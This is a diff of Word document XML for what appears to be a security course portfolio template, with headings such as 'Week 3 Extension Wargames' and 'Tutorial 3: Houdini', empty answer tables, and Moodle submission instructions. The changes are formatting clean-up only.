-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
               <w:rPr>
-                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
-                <w:noProof w:val="0"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="en-US"/>
+                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
               </w:rPr>
             </w:pPr>
           </w:p>
@@ -576,18 +460,8 @@
     </w:tbl>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:suppressLineNumbers w:val="0"/>
-        <w:bidi w:val="0"/>
-        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
-        <w:ind w:left="0" w:right="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
-          <w:noProof w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -595,12 +469,10 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:hyperlink r:id="Rcb69cfc1e1524bb3">
+      <w:hyperlink r:id="rId11">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
-            <w:noProof w:val="0"/>
-            <w:lang w:val="en-US"/>
           </w:rPr>
           <w:t>Estimate Attacker Power</w:t>
         </w:r>
@@ -613,7 +485,7 @@
         <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="9360"/>
+        <w:gridCol w:w="9350"/>
       </w:tblGrid>
       <w:tr>
         <w:trPr>
@@ -622,73 +494,26 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="9360" w:type="dxa"/>
-            <w:tcMar/>
           </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
         </w:tc>
       </w:tr>
     </w:tbl>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
         <w:ind w:left="720"/>
       </w:pPr>
     </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:ind w:left="0"/>
-      </w:pPr>
-    </w:p>
+    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
@@ -696,64 +521,39 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="2"/>
         </w:numPr>
-        <w:suppressLineNumbers w:val="0"/>
-        <w:bidi w:val="0"/>
-        <w:spacing w:before="360" w:beforeAutospacing="off" w:after="80" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
-        <w:ind w:left="270" w:right="0" w:hanging="360"/>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
+        <w:ind w:left="270"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>Extended</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:keepNext w:val="1"/>
-        <w:keepLines w:val="1"/>
-        <w:bidi w:val="0"/>
-        <w:spacing w:before="160" w:beforeAutospacing="off" w:after="80" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
-        <w:ind w:left="0" w:right="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Aptos Display" w:hAnsi="Aptos Display" w:eastAsia="Aptos Display" w:cs="Aptos Display" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:caps w:val="0"/>
-          <w:smallCaps w:val="0"/>
-          <w:noProof w:val="0"/>
-          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
+        <w:keepNext/>
+        <w:keepLines/>
+        <w:spacing w:before="160" w:after="80"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink r:id="Raf66435885f0413e">
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId12">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:ascii="Aptos Display" w:hAnsi="Aptos Display" w:eastAsia="Aptos Display" w:cs="Aptos Display" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
-            <w:b w:val="0"/>
-            <w:bCs w:val="0"/>
-            <w:i w:val="0"/>
-            <w:iCs w:val="0"/>
-            <w:caps w:val="0"/>
-            <w:smallCaps w:val="0"/>
-            <w:strike w:val="0"/>
-            <w:dstrike w:val="0"/>
-            <w:noProof w:val="0"/>
+            <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
             <w:sz w:val="32"/>
             <w:szCs w:val="32"/>
-            <w:lang w:val="en-US"/>
           </w:rPr>
           <w:t>Week 3 Extension Wargames</w:t>
         </w:r>
@@ -762,12 +562,11 @@
     <w:tbl>
       <w:tblPr>
         <w:tblStyle w:val="TableGrid"/>
-        <w:bidiVisual w:val="0"/>
         <w:tblW w:w="0" w:type="auto"/>
         <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="9360"/>
+        <w:gridCol w:w="9350"/>
       </w:tblGrid>
       <w:tr>
         <w:trPr>
@@ -776,88 +575,33 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="9360" w:type="dxa"/>
-            <w:tcMar/>
           </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
         </w:tc>
       </w:tr>
     </w:tbl>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:suppressLineNumbers w:val="0"/>
-        <w:bidi w:val="0"/>
-        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
-        <w:ind w:left="0" w:right="0"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-    </w:p>
+    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
-        <w:suppressLineNumbers w:val="0"/>
-        <w:bidi w:val="0"/>
-        <w:spacing w:before="360" w:beforeAutospacing="off" w:after="80" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
-        <w:ind w:left="0" w:right="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>Analysis and Reflection</w:t>
       </w:r>
@@ -866,20 +610,16 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:hyperlink r:id="R9922dc813a0843b8">
+      <w:hyperlink r:id="rId13">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
-            <w:noProof w:val="0"/>
-            <w:lang w:val="en-US"/>
           </w:rPr>
           <w:t xml:space="preserve">Tutorial </w:t>
         </w:r>
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
-            <w:noProof w:val="0"/>
-            <w:lang w:val="en-US"/>
           </w:rPr>
           <w:t>3: Houdini</w:t>
         </w:r>
@@ -892,7 +632,7 @@
         <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="9360"/>
+        <w:gridCol w:w="9350"/>
       </w:tblGrid>
       <w:tr>
         <w:trPr>
@@ -901,70 +641,21 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="9360" w:type="dxa"/>
-            <w:tcMar/>
           </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
         </w:tc>
       </w:tr>
     </w:tbl>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:suppressLineNumbers w:val="0"/>
-        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
-        <w:ind w:left="0" w:right="0"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-    </w:p>
+    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
@@ -972,82 +663,75 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="2"/>
         </w:numPr>
-        <w:suppressLineNumbers w:val="0"/>
-        <w:bidi w:val="0"/>
-        <w:spacing w:before="360" w:beforeAutospacing="off" w:after="80" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
-        <w:ind w:left="270" w:right="0" w:hanging="360"/>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-        </w:rPr>
+        <w:ind w:left="270"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Wrap up</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
-        <w:ind w:firstLine="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
+      </w:pPr>
+      <w:r>
         <w:t>Submission Instructions</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:suppressLineNumbers w:val="0"/>
-        <w:bidi w:val="0"/>
-        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
-        <w:ind w:left="0" w:right="0"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve">To </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>submit</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve"> a valid portfolio entry, complete the activities, save your work as a PDF, and upload it to the relevant </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>week’s</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve"> submission page on Moodle.</w:t>
+      <w:r>
+        <w:t>To submit a valid portfolio entry, complete the activities, save your work as a PDF, and upload it to the relevant week’s submission page on Moodle.</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:pgSz w:w="12240" w:h="15840" w:orient="portrait"/>
+      <w:headerReference w:type="default" r:id="rId14"/>
+      <w:footerReference w:type="default" r:id="rId15"/>
+      <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
       <w:cols w:space="720"/>
       <w:docGrid w:linePitch="360"/>
-      <w:headerReference w:type="default" r:id="Rc6f69f56d5454b66"/>
-      <w:footerReference w:type="default" r:id="R89dbdb74a425441a"/>
     </w:sectPr>
   </w:body>
 </w:document>
 </file>
 
-<file path=word/footer.xml><?xml version="1.0" encoding="utf-8"?>
-<w:ftr xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
+<file path=word/endnotes.xml><?xml version="1.0" encoding="utf-8"?>
+<w:endnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
+  <w:endnote w:type="separator" w:id="-1">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:separator/>
+      </w:r>
+    </w:p>
+  </w:endnote>
+  <w:endnote w:type="continuationSeparator" w:id="0">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:continuationSeparator/>
+      </w:r>
+    </w:p>
+  </w:endnote>
+</w:endnotes>
+</file>
+
+<file path=word/footer1.xml><?xml version="1.0" encoding="utf-8"?>
+<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:tbl>
     <w:tblPr>
-      <w:tblStyle w:val="TableNormal"/>
-      <w:bidiVisual w:val="0"/>
       <w:tblW w:w="0" w:type="auto"/>
       <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
     </w:tblPr>
@@ -1063,26 +747,21 @@
       <w:tc>
         <w:tcPr>
           <w:tcW w:w="3120" w:type="dxa"/>
-          <w:tcMar/>
         </w:tcPr>
         <w:p>
           <w:pPr>
             <w:pStyle w:val="Header"/>
-            <w:bidi w:val="0"/>
             <w:ind w:left="-115"/>
-            <w:jc w:val="left"/>
           </w:pPr>
         </w:p>
       </w:tc>
       <w:tc>
         <w:tcPr>
           <w:tcW w:w="3120" w:type="dxa"/>
-          <w:tcMar/>
         </w:tcPr>
         <w:p>
           <w:pPr>
             <w:pStyle w:val="Header"/>
-            <w:bidi w:val="0"/>
             <w:jc w:val="center"/>
           </w:pPr>
         </w:p>
@@ -1090,12 +769,10 @@
       <w:tc>
         <w:tcPr>
           <w:tcW w:w="3120" w:type="dxa"/>
-          <w:tcMar/>
         </w:tcPr>
         <w:p>
           <w:pPr>
             <w:pStyle w:val="Header"/>
-            <w:bidi w:val="0"/>
             <w:ind w:right="-115"/>
             <w:jc w:val="right"/>
           </w:pPr>
@@ -1103,10 +780,13 @@
             <w:fldChar w:fldCharType="begin"/>
           </w:r>
           <w:r>
-            <w:instrText xml:space="preserve">PAGE</w:instrText>
+            <w:instrText>PAGE</w:instrText>
           </w:r>
           <w:r>
             <w:fldChar w:fldCharType="separate"/>
+          </w:r>
+          <w:r>
+            <w:t>1</w:t>
           </w:r>
           <w:r>
             <w:fldChar w:fldCharType="end"/>
@@ -1118,18 +798,40 @@
   <w:p>
     <w:pPr>
       <w:pStyle w:val="Footer"/>
-      <w:bidi w:val="0"/>
     </w:pPr>
   </w:p>
 </w:ftr>
 </file>
 
-<file path=word/header.xml><?xml version="1.0" encoding="utf-8"?>
-<w:hdr xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
+<file path=word/footnotes.xml><?xml version="1.0" encoding="utf-8"?>
+<w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
+  <w:footnote w:type="separator" w:id="-1">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:separator/>
+      </w:r>
+    </w:p>
+  </w:footnote>
+  <w:footnote w:type="continuationSeparator" w:id="0">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:continuationSeparator/>
+      </w:r>
+    </w:p>
+  </w:footnote>
+</w:footnotes>
+</file>
+
+<file path=word/header1.xml><?xml version="1.0" encoding="utf-8"?>
